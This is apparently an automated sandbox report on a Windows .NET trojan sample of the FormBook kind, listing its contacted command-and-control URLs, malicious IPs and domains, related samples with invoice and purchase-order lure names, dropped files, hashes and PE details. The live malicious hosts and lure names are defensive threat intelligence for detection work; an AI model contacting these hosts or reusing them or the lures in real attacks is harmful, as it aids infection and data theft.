http://www.cs0724sd92jj.cloud/tma8/?1Dd0AZ=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tAvnDw6NiQ6KU66B+DrNfb3y4zDSs+kNVMrh75Qta+8woV1+WeDNzD8+w4KDRgOL1vrbyIBqcBZw==&-n1P=0hFdS6	true	unknown
http://www.cy-nrg.info/ds60/	true	unknown
http://www.726075.buzz/nuiv/	true	unknown
http://www.57ddu.top/1h9c/?1Dd0AZ=sOtnxD/yobNnegY8jaSsoAQmhivqqrJAOVcBiS67N8+hqBqB+i+1bOvJoDF03ArbwEkHPmpF5H+WU0CTxafZbPEDuWvRa8lUtMqL2ERE56je042ykjvM2v8hySrFvxy+1w==&-n1P=0hFdS6	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reg.ru	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.redimpact.online&rand=	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/web-sites/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.cs0724sd92jj.cloud/tma8/?1Dd0AZ=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tA	tzutil.exe, 00000006.00000002.4511343787.00000000049BA000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000032FA000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www70.clientebradesco.online/	GxqFOvQfqyr.exe, 00000007.00000002.4510820390.000000000348C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://yjsdhy.top	GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.adminbuy.cn	tzutil.exe, 00000006.00000002.4511343787.0000000005C92000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.google.com	tzutil.exe, 00000006.00000002.4511343787.0000000004696000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/dedicated/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://beian.miit.gov.cn/	tzutil.exe, 00000006.00000002.4511343787.0000000005C92000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.redimpact.online&reg_source=parking_auto	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	tzutil.exe, 00000006.00000002.4511343787.0000000005326000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000003C66000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_lan	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://imagecdn.gaopinimages.com/133139509333.jpg)	GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.redimpact.online&utm_medium=parking&utm	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.clientebradesco.online/wouj?gp=1&js=1&uuid=1728484186.0038568114&other_args=eyJ1cmkiOiAiL	tzutil.exe, 00000006.00000002.4511343787.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.000000000348C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.gohoamc.com/upload/image/20180828/20180828173727_41346.jpg)	tzutil.exe, 00000006.00000002.4511343787.0000000005C92000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000045D2000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/hosting/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land_h	tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://www.yjsdhy.top	GxqFOvQfqyr.exe, 00000007.00000002.4512495754.0000000004EF3000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.144.219.16	tkdz666.w.keilao.com	unknown	136933	GIGABITBANK-AS-APGigabitbankGlobalHK	true
162.0.213.94	www.oxilo.info	Canada	35893	ACPCA	true
199.59.243.227	www.personal-loans-jp8.xyz	United States	395082	BODIS-NJUS	true
72.14.178.174	www.clientebradesco.online	United States	63949	LINODE-APLinodeLLCUS	true
45.197.45.172	www.yjsdhy.top	Seychelles	328608	Africa-on-Cloud-ASZA	true
84.32.84.32	anthonyholland.net	Lithuania	33922	NTT-LT-ASLT	true
47.57.185.227	www.726075.buzz	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
154.23.184.218	57ddu.top	United States	174	COGENT-174US	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
119.28.49.194	yuanda.zhongshengxinyun.com	China	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	true
217.160.0.147	www.cy-nrg.info	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
107.163.96.57	www.318st.com	United States	20248	TAKE2US	true
194.58.112.174	www.redimpact.online	Russian Federation	197695	AS-REGRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1530009
Start date and time:	2024-10-09 16:27:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3qsTcL9MOT.exe renamed because original name is a hash value
Original Sample Name:	c008649d9be2b5077e0bc9da54d4908fce8b0bd934a5d2ceccc02cbe003fa3cb.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@19/13
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 116 Number of non-executed functions: 308
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target GxqFOvQfqyr.exe, PID 2296 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 3qsTcL9MOT.exe

Simulations

Behavior and APIs

Time	Type	Description
10:28:07	API Interceptor	1x Sleep call for process: 3qsTcL9MOT.exe modified
10:29:08	API Interceptor	11775093x Sleep call for process: tzutil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.144.219.16	S04307164.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.wwwhg58a.com/hy08/?1bY=GtxhAHB&kBZhq=lbcQgJYCEUlvoTvl8lO0t+1nQ92BuyTIbkaARF8Lbv9kz9N0Syp1gpb0iavr456+vVOb
103.144.219.16	PURCHASING ORDER.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.wwwhg58a.com/hy08/?q4k=lbcQgJYCEUlvoTvl8lO0t+1nQ92BuyTIbkaARF8Lbv9kz9N0Syp1gpb0iZX778C7rQ3KWgrXeg==&3f2pj=9rDXMfLppP84JvX
162.0.213.94	PO #86637.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.kryto.top/09dt/
	invoice.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
	r9856_7.exe	Get hash	malicious	FormBook	Browse	www.zimra.xyz/knrh/
	PO#86637.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
	Scan 00093847.exe	Get hash	malicious	FormBook	Browse	www.kryto.top/09dt/
	Quote #011698.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
	PO#86637.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
	PO#86637.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
199.59.243.227	25XrVZw56S.exe	Get hash	malicious	Unknown	Browse	pleasantcover.net/index.php
	oUc5lyEzJy.exe	Get hash	malicious	Unknown	Browse	pleasantcover.net/index.php
	JUHGSyleu7.exe	Get hash	malicious	Unknown	Browse	pleasantcover.net/index.php
	oUc5lyEzJy.exe	Get hash	malicious	Unknown	Browse	pleasantcover.net/index.php
	JUHGSyleu7.exe	Get hash	malicious	Unknown	Browse	pleasantcover.net/index.php
	4wwi2Lh5W4.exe	Get hash	malicious	Unknown	Browse	pleasantcover.net/index.php
	4wwi2Lh5W4.exe	Get hash	malicious	Unknown	Browse	returncomplete.net/index.php
	7v8szLCQAn.exe	Get hash	malicious	FormBook	Browse	www.donante-de-ovulos.biz/ndmq/
	w64HYOhfv1.exe	Get hash	malicious	FormBook	Browse	www.polarmuseum.info/nuqv/
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	www.polarmuseum.info/reui/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tkdz666.w.keilao.com	S04307164.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.144.219.16
tkdz666.w.keilao.com	PURCHASING ORDER.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.144.219.16
yuanda.zhongshengxinyun.com	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	119.28.49.194
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	119.28.49.194
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	119.28.49.194
natroredirect.natrocdn.com	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	8EhMjL3yNF.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	jpdy1E8K4A.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Products Order Catalogs20242.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rpedido-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	DHL_ 46773482.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	ORIGINAL INVOICE COAU7230734298.pdf.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.redimpact.online	FATURALAR PDF.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	doc330391202408011.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	yyyyyyyy.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	REQST_PRC 410240665_2024.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	REQST_PRC 410240.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	PO 18-3081.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	INVG0088 LHV3495264 BL327291535V.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	PURCHASE ORDER_330011 SEPTEMBER 2024.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
www.clientebradesco.online	FATURALAR PDF.exe	Get hash	malicious	FormBook	Browse	45.33.18.44
	PROFORMA INVOICE BKS-0121-24-25-JP240604.exe	Get hash	malicious	FormBook	Browse	96.126.123.244
	p4LNUqyKZM.exe	Get hash	malicious	FormBook	Browse	45.33.2.79
	PO_987654345678.exe	Get hash	malicious	FormBook	Browse	198.58.118.167
	INV20240828.exe	Get hash	malicious	FormBook	Browse	45.33.23.183
www.personal-loans-jp8.xyz	PO76389.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	r9856_7.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	199.59.243.226

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ACPCA	QmBe2eUtqs.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	9b7dlGj5Gq.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	z10RFQ-202401.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21	Get hash	malicious	Unknown	Browse	162.55.233.29
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.110.107
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.109.237
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.110.171
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.60.249
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.60.239
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.109.216
BODIS-NJUS	25XrVZw56S.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	oUc5lyEzJy.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	JUHGSyleu7.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	oUc5lyEzJy.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	JUHGSyleu7.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	4wwi2Lh5W4.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	4wwi2Lh5W4.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
	PO#001498.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	7v8szLCQAn.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	w64HYOhfv1.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
GIGABITBANK-AS-APGigabitbankGlobalHK	220204-TF1--00.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	20-EM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	RFQ STR-160-01.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	031215-Revised-01.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	Copy of 01. Bill of Material - 705.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	RCZ-PI-4057.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	APS-0240226.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	payment voucher.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	LisectAVT_2403002A_21.exe	Get hash	malicious	Orcus	Browse	45.157.69.156
	LisectAVT_2403002A_298.exe	Get hash	malicious	Orcus	Browse	45.157.69.156
LINODE-APLinodeLLCUS	lWfpGAu3ao.exe	Get hash	malicious	FormBook	Browse	72.14.185.43
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	72.14.178.174
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	45.33.6.223
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	178.79.161.15
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	178.79.161.15
	http://customer.thewayofmoney.us	Get hash	malicious	Unknown	Browse	198.74.56.166
	na.elf	Get hash	malicious	Unknown	Browse	139.162.103.220
	na.elf	Get hash	malicious	Unknown	Browse	50.116.8.209
	reswnop.exe	Get hash	malicious	Emotet	Browse	178.79.161.166
	rfc[1].html	Get hash	malicious	Unknown	Browse	45.56.79.23

Process:	C:\Users\user\Desktop\3qsTcL9MOT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\q3a81SS

Download File

Process:	C:\Windows\SysWOW64\tzutil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.835575320090249
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	3qsTcL9MOT.exe
File size:	716'288 bytes
MD5:	768fe6ad2d197736577304bf3796f440
SHA1:	4c7556dbd40444365c6f0216bc637773308be11d
SHA256:	c008649d9be2b5077e0bc9da54d4908fce8b0bd934a5d2ceccc02cbe003fa3cb
SHA512:	e7e6fa5a41e799260568585ffcaa15d1bac2d79346ed0ca10db09aa80a36392a3fe1f9c9b2a281a2e31266d74e37df4b26f7ff3a401a4dfc4fac6aa033a40caf
SSDEEP:	12288:9cO8bQbxgObRpm8MbguViPq54eCYBA0KOzpXwg0ySq5l8o95G7rtQF3QkseRd8Sg:eIRFQZ6qPLeK1bL/07JQ/vR9hs8a
TLSH:	C4E4124136A6D512D5D50FB01D32C1F423B62D899951D30BAFDE7EEBBCBA3229880367
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{...............0.............".... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4b0322
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD87B04DC [Fri Feb 2 08:27:08 2085 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb02d0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x5b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xae9b8	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
